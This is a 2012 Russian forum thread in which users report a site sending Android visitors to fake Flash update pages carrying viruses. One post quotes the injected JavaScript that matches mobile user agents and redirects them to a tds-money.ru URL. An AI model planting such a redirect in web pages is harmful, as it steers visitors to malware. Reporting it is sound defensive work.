Upashi Опубликовано 14 сентября, 2012 Жалоба Share Опубликовано 14 сентября, 2012 Ссылка на комментарий Поделиться на другие сайты More sharing options...
Эйджил Опубликовано 28 сентября, 2012 Жалоба Share Опубликовано 28 сентября, 2012 При заходе на лицевую сайта с мобилы (андроид) перенаправляет на http://flashpl.com/ без вопросов. До обновления форума та же фигня была с чиби-скином, сейчас его пока нет, не могу подтвердить. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Александр... Опубликовано 3 октября, 2012 Жалоба Share Опубликовано 3 октября, 2012 У одного меня КГЖ открывается с десятой попытки? И вообще, форум работает крайне нестабильно, некоторые темы открывает по пол часа или вообще зависает Ссылка на комментарий Поделиться на другие сайты More sharing options...
Rosetau Опубликовано 3 октября, 2012 Жалоба Share Опубликовано 3 октября, 2012 Да просто я стараюсь навести коммунизм но ничего не получается. Ссылка на комментарий Поделиться на другие сайты More sharing options...
greenkot Опубликовано 9 октября, 2012 Жалоба Share Опубликовано 9 октября, 2012 там наверно должно быть "Не рекомендуется" Ссылка на комментарий Поделиться на другие сайты More sharing options...
istaro Опубликовано 9 октября, 2012 Жалоба Share Опубликовано 9 октября, 2012 Точно, поправил. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Эйджил Опубликовано 9 октября, 2012 Жалоба Share Опубликовано 9 октября, 2012 С андроидной мобилы при заходе на сайт все еще кидает на обновление флэша с вирусами (flash008.com на этот раз). Ссылка на комментарий Поделиться на другие сайты More sharing options...
DupaVoz Опубликовано 10 октября, 2012 Жалоба Share Опубликовано 10 октября, 2012 Подтверждаю. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Айсис Опубликовано 10 октября, 2012 Жалоба Share Опубликовано 10 октября, 2012 там наверно должно быть "Не рекомендуется" У меня вообще, только браузер закрой - надо перелогиниваться. Чистка кэша не помогает =( Ссылка на комментарий Поделиться на другие сайты More sharing options...
Эйджил Опубликовано 11 октября, 2012 Жалоба Share Опубликовано 11 октября, 2012 <script type="text/javascript"> <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){ window.location = "http://tds-money.ru/in.cgi?7"; } //--> </script> - сие в самом начале лицевой страницы сайта. Что там повторять-то? Вырезать надо. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Рекомендуемые сообщения